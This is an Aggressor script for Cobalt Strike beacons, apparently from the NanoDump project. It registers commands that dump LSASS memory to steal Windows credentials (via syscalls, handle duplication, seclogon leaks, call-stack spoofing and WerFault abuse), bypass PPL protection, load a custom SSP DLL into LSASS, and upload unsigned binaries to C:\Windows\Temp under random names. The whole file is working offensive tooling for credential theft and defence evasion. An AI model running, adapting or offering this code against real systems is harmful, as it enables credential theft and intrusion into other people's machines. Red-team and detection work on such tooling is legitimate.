
sub generate_rand_string {
local('@dictionary $string $min_length $max_length $length');
    @dictionary = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $min_length = $1;
    $max_length = $2;
    $length =  $min_length + rand($max_length - $min_length);
    $string = "";
    while ($length != 0)
    {
        $string = $string . rand(@dictionary);
        $length--;
    }
    return $string;
}

sub is_full_path {
local('$string $c');
    $string = lc($1);
    $c = byteAt($string, 0);
    # 97 -> a, 122 -> z
    if ($c < 97 || $c > 122)
    {
        return false;
    }
    $c = byteAt($string, 1);
    # 58 -> :
    if ($c != 58)
    {
        return false;
    }
    $c = byteAt($string, 2);
    # 92 -> \
    if ($c != 92)
    {
        return false;
    }
    return true;
}

beacon_command_register(
"nanodump",
"Use syscalls to dump LSASS.",
"usage: nanodump [--write C:\\Windows\\Temp\\doc.docx] [--valid] [--duplicate] [--seclogon-leak-local] [--seclogon-leak-remote C:\\Windows\\notepad.exe] [--seclogon-duplicate] [--spoof-callstack svchost] [--werfault C:\\Windows\\Temp] [--fork] [--snapshot] [--getpid] [--help]\
Dumpfile options:\
    --write DUMP_PATH, -w DUMP_PATH\
            filename of the dump\
    --valid, -v\
            create a dump with a valid signature\
Obtain an LSASS handle via:\
    --duplicate, -d\
            duplicate an existing LSASS handle\
    --seclogon-leak-local, -sll\
            leak an LSASS handle into nanodump via seclogon\
    --seclogon-leak-remote BIN_PATH, -slt BIN_PATH\
            leak an LSASS handle into another process via seclogon and duplicate it\
    --seclogon-duplicate, -sd\
            make seclogon open a handle to LSASS and duplicate it\
    --spoof-callstack {svchost,wmi,rpc}, -sc {svchost,wmi,rpc}\
            open a handle to LSASS using a fake calling stack\
Let WerFault.exe (instead of nanodump) create the dump\
    --werfault DUMP_FOLDER, -wf DUMP_FOLDER\
            force WerFault.exe to dump LSASS\
Avoid reading LSASS directly:\
    --fork, -f\
            fork the target process before dumping\
    --snapshot, -s\
            snapshot the target process before dumping\
Miscellaneous:\
    --getpid\
            print the PID of LSASS and leave\
Help:\
    --help, -h\
            print this help message and leave");
alias nanodump {
    local('$barch $handle $bof $exe $args $pid $cname $dump_path $write_file $use_valid_sig $fork $snapshot $dup $i $get_pid $use_seclogon_leak_local $use_seclogon_leak_remote $folder $nanodump_binary $werfault_lsass $use_werfault $use_seclogon_duplicate $spoof_callstack');

    $barch = barch($1);
    if($barch eq "x86")
    {
        berror($1, "Nanodump does not support x86");
        return;
    }

    # reading lsass requires elevated privileges
    if(!-isadmin $1)
    {
        berror($1, "You need to be admin to run nanodump.");
        return;
    }

    # read in the BOF file
    $handle = openf(script_resource("dist/nanodump." . $barch . ".o"));
    $bof = readb($handle, -1);
    closef($handle);
    if(strlen($bof) == 0)
    {
        berror($1, "could not read bof file");
        return;
    }

    # by default, don't use werfault
    $werfault_lsass = "";
    $use_werfault = 0;
    # by default, don't set any decoy binary
    $seclogon_leak_remote_binary = "";
    # by default, do not use MalSecLogon leak
    $use_seclogon_leak_local = 0;
    $use_seclogon_leak_remote = 0;
    # by default, do not use the MalSecLogon race condition
    $use_seclogon_duplicate = 0;
    # by default, do not get the PID of LSASS
    $get_pid = 0;
    # by default, nanodump will find the PID of LSASS dinamically
    $pid = 0;
    # name of the dump when downloaded fileless
    $cname = beacon_info($1, "computer");
    $time = int(ticks() / 1000);
    $dump_path = $cname . "_" . $time . "_lsass.dmp";
    # by default, download the minidump fileless
    $write_file = 0;
    # by default, do not fork the target process
    $fork = 0;
    # by default, do not snapshot the target process
    $snapshot = 0;
    # by default, do not duplicate an LSASS handle
    $dup = 0;
    # by default, the signature of the minidump is invalid
    $use_valid_sig = 0;
    # by default, do not spoof the stack
    $spoof_callstack = 0;
    for ($i = 1; $i < size(@_); $i++)
    {
        if (@_[$i] eq "--getpid")
        {
            # get the PID of LSASS and leave
            $get_pid = 1;
        }
        else if (@_[$i] eq "--valid" || @_[$i] eq "-v")
        {
            # use a valid signature for the minidump
            $use_valid_sig = 1;
        }
        else if (@_[$i] eq "--write" || @_[$i] eq "-w")
        {
            $i++;
            if($i >= size(@_))
            {
                berror($1, "missing --write value");
                return;
            }
            # set the path where the minidump will be written to disk
            $write_file = 1;
            $dump_path = @_[$i];
        }
        else if (@_[$i] eq "--pid" || @_[$i] eq "-p")
        {
            $i++;
            if($i >= size(@_))
            {
                berror($1, "missing --pid value");
                return;
            }
            # set the PID of LSASS
            $pid = @_[$i];
            if(!-isnumber $pid || $pid eq "0")
            {
                berror($1, "Invalid PID: " . $pid);
                return;
            }
        }
        else if (@_[$i] eq "--fork" || @_[$i] eq "-f")
        {
            # set arg to true for process forking
            $fork = 1;
        }
        else if (@_[$i] eq "--snapshot" || @_[$i] eq "-s")
        {
            # set arg to true for process snapshot
            $snapshot = 1;
        }
        else if (@_[$i] eq "--duplicate" || @_[$i] eq "-d")
        {
            # set arg to true for handle duplication
            $dup = 1;
        }
        else if (@_[$i] eq "--seclogon-leak-local" || @_[$i] eq "-sll")
        {
            # use MalSecLogon leak local
            $use_seclogon_leak_local = 1;
        }
        else if (@_[$i] eq "--seclogon-leak-remote" || @_[$i] eq "-slr")
        {
            # use MalSecLogon leak remote
            $use_seclogon_leak_remote = 1;
            $i++;
            if($i >= size(@_))
            {
                berror($1, "missing --seclogon-leak-remote value");
                return;
            }
            # decoy binary path
            $seclogon_leak_remote_binary = @_[$i];
            if(!is_full_path($seclogon_leak_remote_binary))
            {
                berror($1, "You must provide a full path: " . $seclogon_leak_remote_binary);
                return;
            }
        }
        else if (@_[$i] eq "--werfault" || @_[$i] eq "-wf")
        {
            $i++;
            if($i >= size(@_))
            {
                berror($1, "missing --werfault value");
                return;
            }
            $use_werfault = 1;
            $werfault_lsass = @_[$i];
        }
        else if (@_[$i] eq "--seclogon-duplicate" || @_[$i] eq "-sd")
        {
            # use the seclogon race condition to dup an LSASS handle
            $use_seclogon_duplicate = 1;
        }
        else if (@_[$i] eq "--spoof-callstack" || @_[$i] eq "-sc")
        {
            if ($barch eq "x86")
            {
                berror($1, "The --spoof-callstack feature is only x64");
                return;
            }
            $i++;
            if($i >= size(@_))
            {
                berror($1, "missing --spoof-callstack value");
                return;
            }
            if (@_[$i] eq "svchost")
            {
                $spoof_callstack = 1;
            }
            else if (@_[$i] eq "wmi")
            {
                $spoof_callstack = 2;
            }
            else if (@_[$i] eq "rpc")
            {
                $spoof_callstack = 3;
            }
            else
            {
                berror($1, "invalid --spoof-callstack value");
                return;
            }
        }
        else if (@_[$i] eq "--help" || @_[$i] eq "-h")
        {
            berror($1, beacon_command_detail("nanodump"));
            return;
        }
        else
        {
            berror($1, "invalid argument: " . @_[$i]);
            return;
        }
    }

    if ($get_pid &&
        ($write_file || &use_valid_sig || $snapshot || $fork ||
         $use_seclogon_duplicate || $spoof_callstack || $use_seclogon_leak_local ||
         $use_seclogon_leak_remote || $dup || $use_werfault))
    {
        berror($1, "The parameter --getpid is used alone");
        return;
    }

    if ($use_werfault &&
        ($write_file || &use_valid_sig || $snapshot || $fork ||
         $use_seclogon_duplicate || $spoof_callstack || $use_seclogon_leak_local ||
         $use_seclogon_leak_remote || $dup))
    {
        berror($1, "The parameter --werfault is used alone");
        return;
    }
    if($fork && $snapshot)
    {
        berror($1, "The options --fork and --snapshot cannot be used together");
        return;
    }

    if($fork && $use_seclogon_duplicate)
    {
        berror($1, "The options --fork and --seclogon-duplicate cannot be used together");
        return;
    }

    if($dup && $spoof_callstack)
    {
        berror($1, "The options --duplicate and --spoof-callstack cannot be used together");
        return;
    }

    if($dup && $use_seclogon_duplicate)
    {
        berror($1, "The options --duplicate and --seclogon-duplicate cannot be used together");
        return;
    }

    if($dup && $use_seclogon_leak_local)
    {
        berror($1, "The options --duplicate and --seclogon-leak-local cannot be used together");
        return;
    }

    if($dup && $use_seclogon_leak_remote)
    {
        berror($1, "The options --duplicate and --seclogon-leak-remote cannot be used together");
        return;
    }

    if($use_seclogon_leak_local && $use_seclogon_leak_remote)
    {
        berror($1, "The options --seclogon-leak-local and --seclogon-leak-remote cannot be used together");
        return;
    }

    if($use_seclogon_leak_local && $use_seclogon_duplicate)
    {
        berror($1, "The options --seclogon-leak-local and --seclogon-duplicate cannot be used together");
        return;
    }

    if($use_seclogon_leak_local && $spoof_callstack)
    {
        berror($1, "The options --seclogon-leak-local and --spoof-callstack cannot be used together");
        return;
    }

    if($use_seclogon_leak_remote && $use_seclogon_duplicate)
    {
        berror($1, "The options --seclogon-leak-remote and --seclogon-duplicate cannot be used together");
        return;
    }

    if($use_seclogon_leak_remote && $spoof_callstack)
    {
        berror($1, "The options --seclogon-leak-remote and --spoof-callstack cannot be used together");
        return;
    }

    if($use_seclogon_duplicate && $snapshot)
    {
        berror($1, "The options --seclogon-duplicate and --snapshot cannot be used together");
        return;
    }

    if($use_seclogon_duplicate && $spoof_callstack)
    {
        berror($1, "The options --seclogon-duplicate and --spoof-callstack cannot be used together");
        return;
    }

    ########################################################



    if($use_seclogon_leak && $use_seclogon_duplicate)
    {
        berror($1, "The options --malseclogon-leak and --seclogon-duplicate cannot be used together");
        return;
    }

    if($use_seclogon_leak_local && !$write_file)
    {
        berror($1, "If --seclogon-leak-local is being used, you need to provide the dump path with --write");
        return;
    }

    if($use_seclogon_leak_local && !is_full_path($dump_path))
    {
        berror($1, "If --seclogon-leak-local is being used, you need to provide the full path: ". $dump_path);
        return;
    }

    if($use_seclogon_leak_local)
    {
        $folder = "C:\\Windows\\Temp";
        $seclogon_leak_remote_binary = $folder . "\\" .  generate_rand_string(5, 10) . ".exe";
        blog($1, "[!] An unsigned nanodump binary will be uploaded to: ". $seclogon_leak_remote_binary);
        # read in the EXE file
        $handle = openf(script_resource("dist/nanodump." . $barch . ".exe"));
        $exe = readb($handle, -1);
        closef($handle);
        if(strlen($exe) == 0)
        {
            berror($1, "could not read exe file");
            return;
        }
        # upload the nanodump binary
        bupload_raw($1, $seclogon_leak_remote_binary, $exe);
    }

    # pack the arguments
    $args = bof_pack($1, "iziiiiiiiiziiiz", $pid, $dump_path, $write_file, $use_valid_sig, $fork, $snapshot, $dup, $get_pid, $use_seclogon_leak_local, $use_seclogon_leak_remote, $seclogon_leak_remote_binary, $use_seclogon_duplicate, $spoof_callstack, $use_werfault, $werfault_lsass);

    # run
    btask($1, "Running NanoDump BOF");
    beacon_inline_execute($1, $bof, "go", $args);
}

beacon_command_register(
"nanodump_ppl",
"Bypass PPL and dump LSASS.",
"usage: nanodump_ppl --write C:\\Windows\\Temp\\doc.docx [--valid] [--duplicate] [--help]\
Dumpfile options:\
    --write DUMP_PATH, -w DUMP_PATH\
            filename of the dump\
    --valid, -v\
            create a dump with a valid signature\
Obtain an LSASS handle via:\
    --duplicate, -d\
            duplicate an existing LSASS handle\
Help:\
    --help, -h\
            print this help message and leave");
alias nanodump_ppl {
    local('$barch $handle $bof $exe $args $dump_path $write_file $use_valid_sig $fork $snapshot $dup $i $dll');

    $barch = barch($1);
    if($barch eq "x86")
    {
        berror($1, "Nanodump does not support x86");
        return;
    }

    # reading lsass requires elevated privileges
    if(!-isadmin $1)
    {
        berror($1, "You need to be admin to run nanodump.");
        return;
    }

    # read in the BOF file
    $handle = openf(script_resource("dist/nanodump_ppl." . $barch . ".o"));
    $bof = readb($handle, -1);
    closef($handle);
    if(strlen($bof) == 0)
    {
        berror($1, "could not read bof file");
        return;
    }

    # read in the DLL file
    $handle = openf(script_resource("dist/nanodump_ppl." . $barch . ".dll"));
    $dll = readb($handle, -1);
    closef($handle);
    if(strlen($dll) == 0)
    {
        berror($1, "could not read dll file");
        return;
    }

    $dump_path = "";
    # by default, download the minidump fileless
    $write_file = 0;
    # by default, do not duplicate an LSASS handle
    $dup = 0;
    # by default, the signature of the minidump is invalid
    $use_valid_sig = 0;
    for ($i = 1; $i < size(@_); $i++)
    {
        if (@_[$i] eq "--write" || @_[$i] eq "-w")
        {
            $i++;
            if($i >= size(@_))
            {
                berror($1, "missing --write value");
                return;
            }
            # set the path where the minidump will be written to disk
            $write_file = 1;
            $dump_path = @_[$i];
        }
        else if (@_[$i] eq "--duplicate" || @_[$i] eq "-d")
        {
            # set arg to true for handle duplication
            $dup = 1;
        }
        else if (@_[$i] eq "--valid" || @_[$i] eq "-v")
        {
            # use a valid signature for the minidump
            $use_valid_sig = 1;
        }
        else if (@_[$i] eq "--help" || @_[$i] eq "-h")
        {
            berror($1, beacon_command_detail("nanodump_ppl"));
            return;
        }
        else
        {
            berror($1, "invalid argument: " . @_[$i]);
            return;
        }
    }

    if ($write_file == 0)
    {
        berror($1, "The --write parameter must be specified");
        return;
    }

    if(!is_full_path($dump_path))
    {
        berror($1, "You need to provide the full path: ". $dump_path);
        return;
    }

    # pack the arguments
    $args = bof_pack($1, "ziib", $dump_path, $use_valid_sig, $dup, $dll);

    # run
    btask($1, "Running NanoDumpPPL BOF");
    beacon_inline_execute($1, $bof, "go", $args);
}

beacon_command_register(
"load_ssp",
"Load a Security Support Provider (SSP) into LSASS.",
"Usage: load_ssp [<SSP path>]");
alias load_ssp {
    local('$barch $handle $bof $exe $args $ssp_path');

    $barch = barch($1);
    if($barch eq "x86")
    {
        berror($1, "Nanodump does not support x86");
        return;
    }

    # loading an SSP requires elevated privileges
    if(!-isadmin $1)
    {
        berror($1, "You need to be admin to load an SSP.");
        return;
    }

    # read in the BOF file
    $handle = openf(script_resource("dist/load_ssp." . $barch . ".o"));
    $bof = readb($handle, -1);
    closef($handle);
    if(strlen($bof) == 0)
    {
        berror($1, "could not read bof file");
        return;
    }

    if (size(@_) == 2)
    {
        $ssp_path = $2;
    }
    else
    {
        $folder = "C:\\Windows\\Temp";
        $ssp_path = $folder . "\\" .  generate_rand_string(5, 10) . ".dll";
        blog($1, "[!] An unsigned nanodump DLL will be uploaded to: ". $ssp_path);
        # read in the DLL file
        $handle = openf(script_resource("dist/nanodump_ssp." . $barch . ".dll"));
        $exe = readb($handle, -1);
        closef($handle);
        if(strlen($exe) == 0)
        {
            berror($1, "could not read DLL file");
            return;
        }
        # upload the nanodump binary
        bupload_raw($1, $ssp_path, $exe);
        # rm could also be used
        blog($1, "Delete the DLL with: delete_file " . $ssp_path);
    }

    # pack the arguments
    $args = bof_pack($1, "z", $ssp_path);

    # run
    btask($1, "Running load_ssp BOF");
    beacon_inline_execute($1, $bof, "go", $args);
}

beacon_command_register(
"delete_file",
"Delete a file.",
"Usage: delete_file <file path>");
alias delete_file {
    local('$barch $handle $bof $args');

    $barch = barch($1);

    # make sure the beacon is not WoW64
    $is64 = binfo($1, "is64");
    if($barch eq "x86" && $is64 == 1)
    {
        berror($1, "delete_file does not support WoW64, use: rm");
        return;
    }

    # read in the BOF file
    $handle = openf(script_resource("dist/delete_file." . $barch . ".o"));
    $bof = readb($handle, -1);
    closef($handle);
    if(strlen($bof) == 0)
    {
        berror($1, "could not read bof file");
        return;
    }

    if (size(@_) != 2)
    {
        berror($1, beacon_command_detail("delete_file"));
        return;
    }

    # pack the arguments
    $args = bof_pack($1, "z", $2);

    # run
    btask($1, "Running delete_file BOF");
    beacon_inline_execute($1, $bof, "go", $args);
}
